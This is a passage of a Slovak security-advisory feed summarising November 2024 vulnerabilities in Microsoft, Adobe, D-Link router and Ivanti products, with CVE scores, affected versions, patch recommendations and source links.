<li>Azure CycleCloud 8.5.0</li>



<li>Azure CycleCloud 8.6.0 – 8.6.4</li>



<li>Azure Database for PostgreSQL Flexible Server 12</li>



<li>Azure Database for PostgreSQL Flexible Server 13</li>



<li>Azure Database for PostgreSQL Flexible Server 14</li>



<li>Azure Database for PostgreSQL Flexible Server 15</li>



<li>Azure Database for PostgreSQL Flexible Server 16</li>



<li>Azure Linux 3.0 ARM</li>



<li>Azure Linux 3.0 x64</li>



<li>CBL Mariner 2.0 ARM</li>



<li>CBL Mariner 2.0 x64</li>



<li>LightGBM</li>



<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft Defender for Endpoint for Android</li>



<li>Microsoft Defender for Endpoint for iOS</li>



<li>Microsoft Excel 2016 (32-bit edition)</li>



<li>Microsoft Excel 2016 (64-bit edition)</li>



<li>Microsoft Excel 2016 Click-to-Run (C2R) for 32-bit editions</li>



<li>Microsoft Excel 2016 Click-to-Run (C2R) for 64-bit editions</li>



<li>Microsoft Exchange Server 2016 Cumulative Update 23</li>



<li>Microsoft Exchange Server 2019 Cumulative Update 13</li>



<li>Microsoft Exchange Server 2019 Cumulative Update 14</li>



<li>Microsoft Office 2016 (32-bit edition)</li>



<li>Microsoft Office 2016 (64-bit edition)</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Office LTSC 2024 for 32-bit editions</li>



<li>Microsoft Office LTSC 2024 for 64-bit editions</li>



<li>Microsoft Office LTSC for Mac 2021</li>



<li>Microsoft Office LTSC for Mac 2024</li>



<li>Microsoft Office Online Server</li>



<li>Microsoft PC Manager</li>



<li>Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 (GDR)</li>



<li>Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 Azure Connect Feature Pack</li>



<li>Microsoft SQL Server 2017 for x64-based Systems (CU 31)</li>



<li>Microsoft SQL Server 2017 for x64-based Systems (GDR)</li>



<li>Microsoft SQL Server 2019 for x64-based Systems (CU 29)</li>



<li>Microsoft SQL Server 2019 for x64-based Systems (GDR)</li>



<li>Microsoft SQL Server 2022 for x64-based Systems (CU 15)</li>



<li>Microsoft SQL Server 2022 for x64-based Systems (GDR)</li>



<li>Microsoft SharePoint Enterprise Server 2016</li>



<li>Microsoft SharePoint Server 2019</li>



<li>Microsoft SharePoint Server Subscription Edition</li>



<li>Microsoft TorchGeo</li>



<li>Microsoft Visual Studio 2022 version 17.10</li>



<li>Microsoft Visual Studio 2022 version 17.11</li>



<li>Microsoft Visual Studio 2022 version 17.6</li>



<li>Microsoft Visual Studio 2022 version 17.8</li>



<li>Microsoft Word 2016 (32-bit edition)</li>



<li>Microsoft Word 2016 (64-bit edition)</li>



<li>Python extension for Visual Studio Code</li>



<li>Visual Studio Code Remote &#8211; SSH Extension</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems</li>



<li>Windows 11 Version 24H2 for x64-based Systems</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>



<li>Windows Server 2025</li>



<li>Windows Server 2025 (Server Core installation)</li>



<li>airlift.microsoft.com</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>I.   Kritické zraniteľnosti:</strong></p>



<p><strong>CVE-2024-43498</strong> (CVSS skóre 9,8)<br><br>Kritická zraniteľnosť v frameworku .NET a produkte Visual Studio spočíva v nesprávnom vyhodnocovaní dátových typov a vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu. Zraniteľnosť možno zneužiť zaslaním špeciálne vytvorenej požiadavky na zraniteľnú webovú aplikáciu vytvorenú v .NET alebo nahraním špeciálne vytvoreného súboru do desktopovej aplikácie Visual Studio.<br><br><strong>CVE-2024-43625</strong> (CVSS skóre 8,1)<br><br>Kritickú zraniteľnosť v komponente Windows VMSwitch, ktorý je súčasťou hypervízora Hyper-V, možno zneužiť na eskaláciu privilégií na úroveň oprávnení SYSTEM a následné vykonanie škodlivého kódu. Lokálny útočník by predmetnú zraniteľnosť mohol zneužiť zaslaním špeciálne vytvorenej sekvencie sieťových požiadaviek na ovládač VMSwitch, ktoré by umožnili použitie odalokovaného miesta v pamäti na Hyper-V hoste.<br><br><strong>CVE-2024-43639</strong> (CVSS skóre 9,8)<br><br>CVE-2024-43639 spočíva v chybnom skracovaní čísel pri konverzii dátových typov v kryptografickom protokole použitom v rámci komponentu Windows Kerberos. Vzdialený neautentifikovaný útočník by ju prostredníctvom špeciálne vytvorenej aplikácie mohol zneužiť na vzdialené vykonanie kódu.<br><br><strong>CVE-2024-49056</strong> (CVSS skóre 7,3)<br><br>Zraniteľnosť online platformy airlift.microsoft.com spočíva v nedostatočnej implementácii mechanizmov autentifikácie a vzdialený autentifikovaný útočník by ju mohol zneužiť na eskaláciu privilégií na platorme. Zraniteľnosť bola automaticky opravená spoločnosťou Microsoft a nevyžaduje dodatočnú aktualizáciu systémov.</p>



<p><strong>II.   Aktívne zneužívané zraniteľnosti:</strong></p>



<p><strong>CVE-2024-43451</strong> (CVSS skóre 6,5)<br><br>Zraniteľnosť v komponente Windows NT LAN Manager by vzdialený neautentifikovaný útočník prostredníctvom podvrhnutia špeciálne vytvoreného súboru mohol zneužiť na získanie NTLMv2 hashu obete, ktorý možno v rámci spoofing útokov zneužiť na získanie neoprávneného prístupu do systému. Zneužitie zraniteľnosť vyžaduje interakciu zo strany používateľa, ktorý musí na škodlivý súbor kliknúť.<br><br><strong>CVE-2024-49039</strong> (CVSS skóre 8,8)<br><br>Windows Task Scheduler obsahuje zraniteľnosť spočívajúcu v nesprávnej implementácii mechanizmov autentifikácie, ktorá umožňuje eskaláciu privilégií na úroveň oprávnení Medium Integrity Level a následné vykonanie RPC (Remote Procedure Call) volaní. Lokálny autentifikovaný útočník by ju mohol zneužiť spustením špeciálne vytvorenej aplikácie v rámci AppContainer.</p>



<p><strong>III.   Významné vysoko závažné zraniteľnosti:</strong></p>



<p><strong>CVE-2024-49040</strong> (CVSS skóre 7,5)<br><br>Vysoko závažná zraniteľnosť v Microsoft Exchange Server spočíva v nesprávnom overovaní poľa P2 FROM e-mailových hlavičiek a vzdialený neautentifikovaný útočník by ju mohol zneužiť na realizáciu e-mailových spoofing útokov. Zraniteľnosť umožňuje zobrazenie ľubovoľnej adresy odosielateľa v používateľskom rozhraní e-mailových klientov. Na uvedenú zraniteľnosť je v súčasnosti dostupný proof-of-concept kód demonštrujúci návod pre jej zneužitie. Bližšie informácie o zraniteľnosti sú dostupné na stránke spoločnosti <a href="https://learn.microsoft.com/en-us/exchange/plan-and-deploy/post-installation-tasks/security-best-practices/exchange-non-compliant-p2from-detection?view=exchserver-2019" data-type="link" data-id="https://learn.microsoft.com/en-us/exchange/plan-and-deploy/post-installation-tasks/security-best-practices/exchange-non-compliant-p2from-detection?view=exchserver-2019">Microsoft</a> a blogu bezpečnostného výskumníka <a href="https://blog.slonser.info/posts/email-attacks/" data-type="link" data-id="https://blog.slonser.info/posts/email-attacks/">Slonser</a>, ktorý ju odhalil.<br><br><strong>CVE-2024-49019</strong> (CVSS skóre 7,8)<br><br>Zraniteľnosť v rámci Active Directory Certificate Services umožňuje lokálnemu autentifikovanému útočníkovi zneužiť zabudované templaty certifikátov (napr. WebServer template) na vytvorenie CSR (Certificate Signing Request) požiadaviek vedúcich k eskalácii privilégií na úroveň doménového administrátora. Zraniteľné sú všetky certifikáty vytvorené použitím <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/certificate-template-concepts#certificate-template-versions" data-type="link" data-id="https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/certificate-template-concepts#certificate-template-versions">templatu verzie 1</a>, na ktorých je pole „Source of subject name“ nastavené na hodnotu „Supplied in the request“ a templaty nie sú zabezpečené podľa <a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn786426%28v=ws.11%29#securing-certificate-templates" data-type="link" data-id="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn786426%28v=ws.11%29#securing-certificate-templates">návodu pre zabezpečenie PKI</a> od spoločnosti Microsoft. Zraniteľnosť objavili bezpečnostní výskumníci zo spoločnosti TrustedSec, ktorá zverejnila aj <a href="https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc" data-type="link" data-id="https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc">kompletnú analýzu</a>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong><span style="mso-fareast-font-family:&quot;Times New Roman&quot;;
     mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:
     SK"></span>Eskalácia privilégií</strong></li>



<li><strong><span style="mso-fareast-font-family:&quot;Times New Roman&quot;;
     mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:
     SK"></span>Neoprávnený prístup k citlivým údajom</strong></li>



<li><strong><span style="mso-fareast-font-family:
     &quot;Times New Roman&quot;;mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;
     mso-fareast-language:SK"></span>Zneprístupnenie služby</strong></li>



<li><strong><span style="mso-fareast-font-family:&quot;Times New Roman&quot;;
     mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:
     SK"></span>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Spoofing</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladné nasadenie augustového balíka opráv na zraniteľné produkty spoločnosti Microsoft. Bližšie informácie nájdete <a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Nov" data-type="link" data-id="https://msrc.microsoft.com/update-guide/releaseNote/2024-Nov">tu</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Nov">https://msrc.microsoft.com/update-guide/releaseNote/2024-Nov</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43498">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43498</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43625">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43625</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43639">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43639</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49056">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49056<span class="MsoHyperlink"></span></a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-43451">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-43451</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-49039">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-49039</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49040">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49040</a></li>



<li><a href="https://learn.microsoft.com/en-us/exchange/plan-and-deploy/post-installation-tasks/security-best-practices/exchange-non-compliant-p2from-detection?view=exchserver-2019">https://learn.microsoft.com/en-us/exchange/plan-and-deploy/post-installation-tasks/security-best-practices/exchange-non-compliant-p2from-detection?view=exchserver-2019</a></li>



<li><a href="https://blog.slonser.info/posts/email-attacks/">https://blog.slonser.info/posts/email-attacks/</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1667/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Bezpečnostné zraniteľnosti v produktoch Adobe</title>
		<link>/posts/1665</link>
					<comments>/posts/1665#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 14 Nov 2024 14:02:21 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1665</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty Adobe Bridge, Audition, After Effects, Substance 3D Painter, Illustrator, InDesign, Photoshop a Commerce,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>
<p><strong>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty Adobe Bridge, Audition, After Effects, Substance 3D Painter, Illustrator, InDesign, Photoshop a Commerce, ktoré opravujú 48 zraniteľností, z čoho 28 sú označené ako kritické. Najzávažnejšie zraniteľnosti by vzdialený neautentifikovaný útočník prostredníctvom podvrhnutia špeciálne vytvorených súborov mohol zneužiť na vykonanie škodlivého kódu. Ostatné zraniteľnosti umožňujú získanie neoprávneného prístupu k citlivým údajom, obídenie bezpečnostných prvkov a zneprístupnenie služby.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Adobe Bridge vo verziách starších ako 15.0</li>



<li>Adobe Bridge vo verziách starších ako 14.1.3</li>



<li>Adobe Audition vo verziách starších ako 25.0</li>



<li>Adobe Audition vo verziách starších ako 24.6.3</li>



<li>Adobe After Effects vo verziách starších ako 25.0</li>



<li>Adobe After Effects vo verziách starších ako 24.6.3</li>



<li>Adobe Substance 3D Painter vo verziách starších ako 10.1.1</li>



<li>Adobe Illustrator 2024 vo verziách starších ako 29.0.0</li>



<li>Adobe Illustrator 2024 vo verziách starších ako 28.7.2</li>



<li>Adobe InDesign vo verziách starších ako ID20.0</li>



<li>Adobe InDesign vo verziách starších ako ID18.5.4</li>



<li>Adobe InDesign vo verziách starších ako ID18.5.3</li>



<li>Adobe Commerce a Magento Open Source vo verziách starších ako 3.2.6 (prevádzkované ako software-as-a-service prostredníctvom Adobe Commerce Services)</li>



<li>Adobe Photoshop 2023 vo verziách starších ako 24.7.4</li>



<li>Adobe Photoshop 2024 vo verziách starších ako 25.12</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><span style="text-decoration: underline;">Adobe Substance 3D Painter:</span></strong><br><br><strong>CVE-2024-49525, CVE-2024-49519, CVE-2024-47426, CVE-2024-47427, CVE-2024-47428, CVE-2024-47429, CVE-2024-47430, CVE-2024-49515, CVE-2024-49516, CVE-2024-47431, CVE-2024-49517, CVE-2024-47432, CVE-2024-49518, CVE-2024-49520, CVE-2024-47433, CVE-2024-47434</strong> (CVSS skóre 7,8)<br><br>Bezpečnostné zraniteľnosti v produkte Substance 3D Painter spočívajúce v nedostatočnom overovaní vyhľadávacích ciest (CVE-2024-49515), dvojitom uvoľnení pamäte (CVE-2024-47426), pretečení medzipamäte haldy (CVE-2024-49525, CVE-2024-47431, CVE-2024-49517) a zápise mimo povolených hodnôt (ostatné) možno zneužiť na vykonanie škodlivého kódu.</p>



<p><strong><span style="text-decoration: underline;">Adobe After Effects:</span></strong><br><br><strong>CVE-2024-47441, CVE-2024-47442, CVE-2024-47443</strong> (CVSS skóre 7,8)<br><br>Zraniteľnosti spočívajúce v zápise mimo povolených hodnôt možno zneužiť na vykonanie škodlivého kódu.</p>



<p><strong><span style="text-decoration: underline;">Adobe Illustrator:</span></strong><br><br><strong>CVE-2024-45114, CVE-2024-47450, CVE-2024-47451, CVE-2024-47452</strong> (CVSS skóre 7,8)<br><br>Zraniteľnosť spočívajúcu v zápise mimo povolených hodnôt a pretečení medzipamäte haldy možno zneužiť na vykonanie škodlivého kódu.</p>



<p><strong><span style="text-decoration: underline;">Adobe InDesign:</span></strong><br><br><strong>CVE-2024-49507, CVE-2024-49508, CVE-2024-49509</strong> (CVSS skóre 7,8)<br><br>Uvedené zraniteľnosti spočívajú v pretečení medzipamäte haldy a umožňujú vykonanie škodlivého kódu.</p>



<p><strong><span style="text-decoration: underline;">Adobe Photoshop</span></strong><br><br><strong>CVE-2024-49514</strong> (CVSS skóre 7,8)<br><br>Podtečenie celočíselnej premennej možno zneužiť na vykonanie škodlivého kódu.</p>



<p><em>Zneužitie vyššie uvedených zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí stiahnuť a otvoriť špeciálne vytvorené súbory.</em></p>



<p><strong><span style="text-decoration: underline;">Adobe Commerce a Magento Open Source:</span></strong><br><br><strong>CVE-2024-49521</strong> (CVSS skóre 7,7)<br><br>Bližšie nešpecifikovanú zraniteľnosť by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených požiadaviek zo zraniteľných serverov na interné systémy mohol zneužiť na realizáciu SSRF (Server Side Request Forgery) útokov a obídenie bezpečnostných prvkov.</p>



<p><em>Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.</em></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie škodlivého kódu</strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom<span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:
     Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:SK"></span></strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://helpx.adobe.com/security/products/bridge/apsb24-77.html">https://helpx.adobe.com/security/products/bridge/apsb24-77.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/audition/apsb24-83.html">https://helpx.adobe.com/security/products/audition/apsb24-83.html<span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://helpx.adobe.com/security/products/after_effects/apsb24-85.html">https://helpx.adobe.com/security/products/after_effects/apsb24-85.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/substance3d_painter/apsb24-86.html">https://helpx.adobe.com/security/products/substance3d_painter/apsb24-86.html<span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://helpx.adobe.com/security/products/illustrator/apsb24-87.html">https://helpx.adobe.com/security/products/illustrator/apsb24-87.html<span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://helpx.adobe.com/security/products/indesign/apsb24-88.html">https://helpx.adobe.com/security/products/indesign/apsb24-88.html<span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://helpx.adobe.com/security/products/photoshop/apsb24-89.html">https://helpx.adobe.com/security/products/photoshop/apsb24-89.html<span style="mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://helpx.adobe.com/security/products/magento/apsb24-90.html">https://helpx.adobe.com/security/products/magento/apsb24-90.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1665/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v routroch D-Link DSL6740C s ukončenou technickou podporou</title>
		<link>/posts/1663</link>
					<comments>/posts/1663#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 14 Nov 2024 13:49:31 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[D-Link]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=1663</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/D-Link-Logo.wine_-1024x683.png" alt="" /></p>Bezpečnostní výskumníci zverejnili informácie o 7 zraniteľnostiach routrov D-LINK DSL6740C, z ktorých jedna je označená ako kritická. Kritickú zraniteľnosť CVE-2024-11068...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/D-Link-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zverejnili informácie o 7 zraniteľnostiach routrov D-LINK DSL6740C, z ktorých jedna je označená ako kritická. Kritickú zraniteľnosť CVE-2024-11068 možno zneužiť na získanie úplnej kontroly na zariadením. Ostatné zraniteľnosti možno zneužiť na injekciu príkazov a získanie neoprávneného prístupu k citlivým údajom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>D-Link DSL6740C (ukončená technická podpora)</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-11068</strong> (CVSS skóre 9,8)<br><br>Kritická zraniteľnosť s označením CVE-2024-11068 spočíva v nedostatočnom zabezpečení privilegovaného API a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek mohol zneužiť na zmenu hesiel ľubovoľných používateľov a získanie úplnej kontroly nad zariadením.<br><br><strong>CVE-2024-11067</strong> (CVSS skóre 7,5)<br><br>CVE-2024-11067 možno zneužiť na čítanie systémových súborov zariadenia a získanie neoprávneného prístupu k citlivým údajom. Zo systémových súborov možno extrahovať aj MAC adresu zariadenia, ktorá je predvoleným heslom pre prístup do administratívneho rozhrania.<br><br><strong>CVE-2024-11066</strong>, <strong>CVE-2024-11062</strong>, <strong>CVE-2024-11063</strong>, <strong>CVE-2024-11064</strong>, <strong>CVE-2024-11065</strong> (CVSS skóre 7,2)<br><br>Bližšie nešpecifikované zraniteľnosti by vzdialený autentifikovaný útočník s oprávneniami administrátora mohol zneužiť na injekciu systémových príkazov prostredníctvom webového rozhrania (CVE-2024-11066) alebo SSH a TELNET spojenia (CVE-2024-11062, CVE-2024-11063, CVE-2024-11064 a CVE-2024-11065).</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnená zmena v systéme<span style="mso-fareast-font-family:&quot;Times New Roman&quot;;
     mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:
     SK"></span></strong></li>



<li><strong>Neoprávnený prístup do systému<span style="mso-fareast-font-family:&quot;Times New Roman&quot;;
     mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:
     SK"></span></strong></li>



<li><strong>Získanie úplnej kontroly nad systémom<span style="mso-fareast-font-family:
     &quot;Times New Roman&quot;;mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;
     mso-fareast-language:SK"></span></strong></li>



<li><strong>Injekcia príkazov</strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Nakoľko sa jedná o produkty s ukončenou technickou podporou, spoločnosť D-LINK neplánuje vydať aktualizácie a odporúča prejsť na alternatívne produkty s platnou podporou. V prípade, že prechod na nové produkty nie je možné vykonať ihneď, odporúčame limitovať prístup k manažmentovému rozhraniu zariadení a používať silné heslá.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10414">https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10414</a></li>



<li><a href="https://www.twcert.org.tw/en/cp-139-8234-0514c-2.html">https://www.twcert.org.tw/en/cp-139-8234-0514c-2.html</a></li>



<li><a href="https://www.twcert.org.tw/en/cp-139-8233-903d9-2.html">https://www.twcert.org.tw/en/cp-139-8233-903d9-2.html<span class="MsoHyperlink"></span></a></li>



<li><a href="https://www.twcert.org.tw/en/cp-139-8232-5d94e-2.html">https://www.twcert.org.tw/en/cp-139-8232-5d94e-2.html</a></li>



<li><a href="https://www.twcert.org.tw/en/cp-139-8228-1fbb0-2.html">https://www.twcert.org.tw/en/cp-139-8228-1fbb0-2.html</a></li>



<li><a href="https://www.twcert.org.tw/en/cp-139-8229-3c2ab-2.html">https://www.twcert.org.tw/en/cp-139-8229-3c2ab-2.html</a></li>



<li><a href="https://www.twcert.org.tw/en/cp-139-8230-11430-2.html">https://www.twcert.org.tw/en/cp-139-8230-11430-2.html</a></li>



<li><a href="https://www.twcert.org.tw/en/cp-139-8231-2432e-2.html">https://www.twcert.org.tw/en/cp-139-8231-2432e-2.html</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/d-link-wont-fix-critical-bug-in-60-000-exposed-eol-modems/">https://www.bleepingcomputer.com/news/security/d-link-wont-fix-critical-bug-in-60-000-exposed-eol-modems/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1663/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické bezpečnostné zraniteľnosti v produktoch Ivanti EPM, ICS a IPS</title>
		<link>/posts/1661</link>
					<comments>/posts/1661#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 14 Nov 2024 13:39:40 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Ivanti]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1661</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 43 bezpečnostných zraniteľností v produktoch Ivanti Endpoint Manager (EPM), Ivanti Connect Secure (ICS), Ivanti Policy...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 43 bezpečnostných zraniteľností v produktoch Ivanti Endpoint Manager (EPM), Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS) a Ivanti Secure Access Client (ISAC), z čoho 9 je označených ako kritických. Kritické zraniteľnosti možno zneužiť na vzdialené vykonanie kódu. Ostatné zraniteľnosti možno zneužiť na vzdialené vykonanie kódu, zneprístupnenie služby, eskaláciu privilégií a vykonanie neoprávnených zmien v systéme.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ivanti Endpoint Manager 2022 SU6 bez bezpečnostných záplat z novembra 2024</li>



<li>Ivanti Endpoint Manager 2024 bez bezpečnostných záplat z novembra 2024</li>



<li>Ivanti Connect Secure vo verziách starších ako 22.7R2.3</li>



<li>Ivanti Policy Secure vo verziách starších ako 22.7R1.2</li>



<li>Ivanti Secure Access Client vo verziách starších ako 22.7R4</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><span style="text-decoration: underline;">Ivanti Endpoint Manager:</span></strong></p>



<p><strong>CVE-2024-50330</strong> (CVSS skóre 9,8)<br><br>Kritická zraniteľnosť spočíva v nedostatočnom overovaní používateľských vstupov a vzdialený neautentifikovaný útočník by ju prostredníctvom SQL injekcie mohol zneužiť na vzdialené vykonanie kódu.</p>



<p><strong><span style="text-decoration: underline;">Ivanti Connect Secure, Ivanti Policy Secure:</span></strong></p>



